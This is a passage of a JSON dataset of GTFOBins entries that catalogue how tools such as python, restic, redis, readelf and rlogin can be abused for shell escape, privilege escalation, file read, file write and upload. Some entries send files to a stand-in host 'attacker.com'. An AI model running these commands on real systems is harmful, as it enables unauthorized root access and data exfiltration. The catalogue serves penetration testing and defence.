context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:python:shell:0:capabilities","toolId":"gtfo:python","toolName":"python","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"python -c 'import os; os.setuid(0); os.execl(\"/bin/sh\", \"sh\")'","mitre":["T1059"],"privilege":"capabilities","context":"capabilities","references":["https://gtfobins.github.io/gtfobins/python/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:python:shell:0:sudo","toolId":"gtfo:python","toolName":"python","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"python -c 'import os; os.execl(\"/bin/sh\", \"sh\")'","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/python/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:python:shell:0:suid","toolId":"gtfo:python","toolName":"python","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"python -c 'import os; os.execl(\"/bin/sh\", \"sh\", \"-p\")'","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/python/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:python:shell:0:unprivileged","toolId":"gtfo:python","toolName":"python","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"python -c 'import os; os.execl(\"/bin/sh\", \"sh\")'","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/python/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:python:upload:0:sudo","toolId":"gtfo:python","toolName":"python","name":"upload","source":"GTFOBins","platform":["Linux"],"capability":["File Upload","Privilege Escalation"],"nativeCategory":["upload"],"command":"python -c 'import sys\nif sys.version_info.major == 3: import urllib.request as r, urllib.parse as u\nelse: import urllib as u, urllib2 as r\nr.urlopen(\"http://attacker.com\", open(\"/path/to/input-file\", \"rb\").read())'","mitre":["T1041"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/python/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:python:upload:0:suid","toolId":"gtfo:python","toolName":"python","name":"upload","source":"GTFOBins","platform":["Linux"],"capability":["File Upload","Privilege Escalation"],"nativeCategory":["upload"],"command":"python -c 'import sys\nif sys.version_info.major == 3: import urllib.request as r, urllib.parse as u\nelse: import urllib as u, urllib2 as r\nr.urlopen(\"http://attacker.com\", open(\"/path/to/input-file\", \"rb\").read())'","mitre":["T1041"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/python/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:python:upload:0:unprivileged","toolId":"gtfo:python","toolName":"python","name":"upload","source":"GTFOBins","platform":["Linux"],"capability":["File Upload"],"nativeCategory":["upload"],"command":"python -c 'import sys\nif sys.version_info.major == 3: import urllib.request as r, urllib.parse as u\nelse: import urllib as u, urllib2 as r\nr.urlopen(\"http://attacker.com\", open(\"/path/to/input-file\", \"rb\").read())'","mitre":["T1041"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/python/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:python:upload:1:sudo","toolId":"gtfo:python","toolName":"python","name":"upload","source":"GTFOBins","platform":["Linux"],"capability":["File Upload","Privilege Escalation"],"nativeCategory":["upload"],"command":"python -c 'import sys\nif sys.version_info.major == 3: import http.server as s, socketserver as ss\nelse: import SimpleHTTPServer as s, SocketServer as ss\nss.TCPServer((\"\", 12345), s.SimpleHTTPRequestHandler).serve_forever()'","mitre":["T1041"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/python/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:python:upload:1:suid","toolId":"gtfo:python","toolName":"python","name":"upload","source":"GTFOBins","platform":["Linux"],"capability":["File Upload","Privilege Escalation"],"nativeCategory":["upload"],"command":"python -c 'import sys\nif sys.version_info.major == 3: import http.server as s, socketserver as ss\nelse: import SimpleHTTPServer as s, SocketServer as ss\nss.TCPServer((\"\", 12345), s.SimpleHTTPRequestHandler).serve_forever()'","mitre":["T1041"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/python/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:python:upload:1:unprivileged","toolId":"gtfo:python","toolName":"python","name":"upload","source":"GTFOBins","platform":["Linux"],"capability":["File Upload"],"nativeCategory":["upload"],"command":"python -c 'import sys\nif sys.version_info.major == 3: import http.server as s, socketserver as ss\nelse: import SimpleHTTPServer as s, SocketServer as ss\nss.TCPServer((\"\", 12345), s.SimpleHTTPRequestHandler).serve_forever()'","mitre":["T1041"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/python/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:qpdf:file-read:0:sudo","toolId":"gtfo:qpdf","toolName":"qpdf","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"qpdf --empty --add-attachment /path/to/input-file --key=x -- /path/to/output-file\nqpdf --show-attachment=x /path/to/output-file","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/qpdf/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:qpdf:file-read:0:suid","toolId":"gtfo:qpdf","toolName":"qpdf","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"qpdf --empty --add-attachment /path/to/input-file --key=x -- /path/to/output-file\nqpdf --show-attachment=x /path/to/output-file","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/qpdf/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:qpdf:file-read:0:unprivileged","toolId":"gtfo:qpdf","toolName":"qpdf","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"qpdf --empty --add-attachment /path/to/input-file --key=x -- /path/to/output-file\nqpdf --show-attachment=x /path/to/output-file","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/qpdf/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:rake:file-read:0:sudo","toolId":"gtfo:rake","toolName":"rake","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"rake -f /path/to/input-file","description":"The file is actually parsed and the first wrong line is returned in an error message.","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/rake/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:rake:file-read:0:unprivileged","toolId":"gtfo:rake","toolName":"rake","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"rake -f /path/to/input-file","description":"The file is actually parsed and the first wrong line is returned in an error message.","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/rake/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:rake:inherit:0:sudo","toolId":"gtfo:rake","toolName":"rake","name":"inherit ← ruby","source":"GTFOBins","platform":["Linux"],"capability":["File Download","File Read","File Write","Library Load","Reverse/Bind Shell","Execution","File Upload","Privilege Escalation"],"nativeCategory":["inherit","from:ruby"],"command":"rake -p '...'","description":"This allows to run Ruby code (`...`).","mitre":["T1105","T1005","T1565","T1574","T1059","T1071","T1041"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/rake/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:rake:inherit:0:unprivileged","toolId":"gtfo:rake","toolName":"rake","name":"inherit ← ruby","source":"GTFOBins","platform":["Linux"],"capability":["File Download","File Read","File Write","Library Load","Reverse/Bind Shell","Execution","File Upload"],"nativeCategory":["inherit","from:ruby"],"command":"rake -p '...'","description":"This allows to run Ruby code (`...`).","mitre":["T1105","T1005","T1565","T1574","T1059","T1071","T1041"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/rake/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:ranger:shell:0:sudo","toolId":"gtfo:ranger","toolName":"ranger","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"ranger\nS","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/ranger/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:ranger:shell:0:unprivileged","toolId":"gtfo:ranger","toolName":"ranger","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"ranger\nS","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/ranger/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:rc:shell:0:sudo","toolId":"gtfo:rc","toolName":"rc","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"rc","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/rc/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:rc:shell:0:suid","toolId":"gtfo:rc","toolName":"rc","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"rc","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/rc/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:rc:shell:0:unprivileged","toolId":"gtfo:rc","toolName":"rc","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"rc","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/rc/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:readelf:file-read:0:sudo","toolId":"gtfo:readelf","toolName":"readelf","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"readelf -a @/path/to/input-file","description":"Each line is corrupted by a prefix string and wrapped inside single quotes. Also consider that lines are actually parsed as `readelf` options thus some file contents may lead to unexpected results.","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/readelf/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:readelf:file-read:0:suid","toolId":"gtfo:readelf","toolName":"readelf","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"readelf -a @/path/to/input-file","description":"Each line is corrupted by a prefix string and wrapped inside single quotes. Also consider that lines are actually parsed as `readelf` options thus some file contents may lead to unexpected results.","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/readelf/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:readelf:file-read:0:unprivileged","toolId":"gtfo:readelf","toolName":"readelf","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"readelf -a @/path/to/input-file","description":"Each line is corrupted by a prefix string and wrapped inside single quotes. Also consider that lines are actually parsed as `readelf` options thus some file contents may lead to unexpected results.","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/readelf/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:redcarpet:file-read:0:sudo","toolId":"gtfo:redcarpet","toolName":"redcarpet","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"redcarpet /path/to/input-file","description":"The file is actually parsed as a Markdown file.","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/redcarpet/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:redcarpet:file-read:0:unprivileged","toolId":"gtfo:redcarpet","toolName":"redcarpet","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"redcarpet /path/to/input-file","description":"The file is actually parsed as a Markdown file.","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/redcarpet/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:redis:file-write:0:sudo","toolId":"gtfo:redis","toolName":"redis","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write","Privilege Escalation"],"nativeCategory":["file-write"],"command":"redis-cli -h 127.0.0.1\nconfig set dir /path/to/output-dir/\nconfig set dbfilename output-file\nset x \"DATA\"\nsave","description":"Write files on the server running Redis at the specified location. Written data will appear amongst the database dump.\n\nKeep in mind that it's actually the server to perform the file write.","mitre":["T1565"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/redis/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:redis:file-write:0:suid","toolId":"gtfo:redis","toolName":"redis","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write","Privilege Escalation"],"nativeCategory":["file-write"],"command":"redis-cli -h 127.0.0.1\nconfig set dir /path/to/output-dir/\nconfig set dbfilename output-file\nset x \"DATA\"\nsave","description":"Write files on the server running Redis at the specified location. Written data will appear amongst the database dump.\n\nKeep in mind that it's actually the server to perform the file write.","mitre":["T1565"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/redis/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:redis:file-write:0:unprivileged","toolId":"gtfo:redis","toolName":"redis","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write"],"nativeCategory":["file-write"],"command":"redis-cli -h 127.0.0.1\nconfig set dir /path/to/output-dir/\nconfig set dbfilename output-file\nset x \"DATA\"\nsave","description":"Write files on the server running Redis at the specified location. Written data will appear amongst the database dump.\n\nKeep in mind that it's actually the server to perform the file write.","mitre":["T1565"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/redis/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:restic:command:0:sudo","toolId":"gtfo:restic","toolName":"restic","name":"command","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["command"],"command":"RESTIC_PASSWORD_COMMAND='/path/to/command' restic backup","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/restic/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:restic:command:0:suid","toolId":"gtfo:restic","toolName":"restic","name":"command","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["command"],"command":"RESTIC_PASSWORD_COMMAND='/path/to/command' restic backup","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/restic/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:restic:command:0:unprivileged","toolId":"gtfo:restic","toolName":"restic","name":"command","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["command"],"command":"RESTIC_PASSWORD_COMMAND='/path/to/command' restic backup","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/restic/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:restic:command:1:sudo","toolId":"gtfo:restic","toolName":"restic","name":"command","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["command"],"command":"restic --password-command='/path/to/command' backup","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/restic/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:restic:command:1:suid","toolId":"gtfo:restic","toolName":"restic","name":"command","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["command"],"command":"restic --password-command='/path/to/command' backup","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/restic/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:restic:command:1:unprivileged","toolId":"gtfo:restic","toolName":"restic","name":"command","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["command"],"command":"restic --password-command='/path/to/command' backup","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/restic/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:restic:shell:0:sudo","toolId":"gtfo:restic","toolName":"restic","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"RESTIC_PASSWORD_COMMAND='/bin/sh -c \"/bin/sh 0<&2 1<&2\"' restic backup","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/restic/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:restic:shell:0:suid","toolId":"gtfo:restic","toolName":"restic","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"RESTIC_PASSWORD_COMMAND='/bin/sh -p -c \"/bin/sh -p 0<&2 1<&2\"' restic backup","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/restic/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:restic:shell:0:unprivileged","toolId":"gtfo:restic","toolName":"restic","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"RESTIC_PASSWORD_COMMAND='/bin/sh -c \"/bin/sh 0<&2 1<&2\"' restic backup","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/restic/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:restic:shell:1:sudo","toolId":"gtfo:restic","toolName":"restic","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"restic --password-command='/bin/sh -c \"/bin/sh 0<&2 1<&2\"' backup","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/restic/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:restic:shell:1:suid","toolId":"gtfo:restic","toolName":"restic","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"restic --password-command='/bin/sh -p -c \"/bin/sh -p 0<&2 1<&2\"' backup","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/restic/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:restic:shell:1:unprivileged","toolId":"gtfo:restic","toolName":"restic","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"restic --password-command='/bin/sh -c \"/bin/sh 0<&2 1<&2\"' backup","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/restic/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:restic:upload:0:sudo","toolId":"gtfo:restic","toolName":"restic","name":"upload","source":"GTFOBins","platform":["Linux"],"capability":["File Upload","Privilege Escalation"],"nativeCategory":["upload"],"command":"restic backup -r rest:http://attacker.com:12345/x /path/to/input-file","mitre":["T1041"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/restic/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:restic:upload:0:suid","toolId":"gtfo:restic","toolName":"restic","name":"upload","source":"GTFOBins","platform":["Linux"],"capability":["File Upload","Privilege Escalation"],"nativeCategory":["upload"],"command":"restic backup -r rest:http://attacker.com:12345/x /path/to/input-file","mitre":["T1041"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/restic/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:restic:upload:0:unprivileged","toolId":"gtfo:restic","toolName":"restic","name":"upload","source":"GTFOBins","platform":["Linux"],"capability":["File Upload"],"nativeCategory":["upload"],"command":"restic backup -r rest:http://attacker.com:12345/x /path/to/input-file","mitre":["T1041"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/restic/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:rev:file-read:0:sudo","toolId":"gtfo:rev","toolName":"rev","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"rev /path/to/input-file | rev","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/rev/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:rev:file-read:0:suid","toolId":"gtfo:rev","toolName":"rev","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"rev /path/to/input-file | rev","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/rev/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:rev:file-read:0:unprivileged","toolId":"gtfo:rev","toolName":"rev","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"rev /path/to/input-file | rev","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/rev/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:rlogin:upload:0:sudo","toolId":"gtfo:rlogin","toolName":"rlogin","name":"upload","source":"GTFOBins","platform":["Linux"],"capability":["File Upload","Privilege Escalation"],"nativeCategory":["upload"],"command":"rlogin -l DATA -p 12345 attacker.com","description":"The file is corrupted by leading and trailing spurious data.","mitre":["T1041"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/rlogin/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:rlogin:upload:0:suid","toolId":"gtfo:rlogin","toolName":"rlogin","name":"upload","source":"GTFOBins","platform":["Linux"],"capability":["File Upload","Privilege Escalation"],"nativeCategory":["upload"],"command":"rlogin -l DATA -p 12345 attacker.com","description":"The file is corrupted by leading and trailing spurious data.","mitre":["T1041"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/rlogin/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:rlogin:upload:0:unprivileged","toolId":"gtfo:rlogin","toolName":"rlogin","name":"upload","source":"GTFOBins","platform":["Linux"],"capability":["File Upload"],"nativeCategory":["upload"],"command":"rlogin -l DATA -p 12345 attacker.com","description":"The file is corrupted by leading and trailing spurious data.","mitre":["T1041"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/rlogin/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:rlwrap:file-write:0:sudo","toolId":"gtfo:rlwrap","toolName":"rlwrap","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write","Privilege Escalation"],"nativeCategory":["file-write"],"command":"rlwrap -l /path/to/output-file echo DATA","description":"This adds timestamps to the 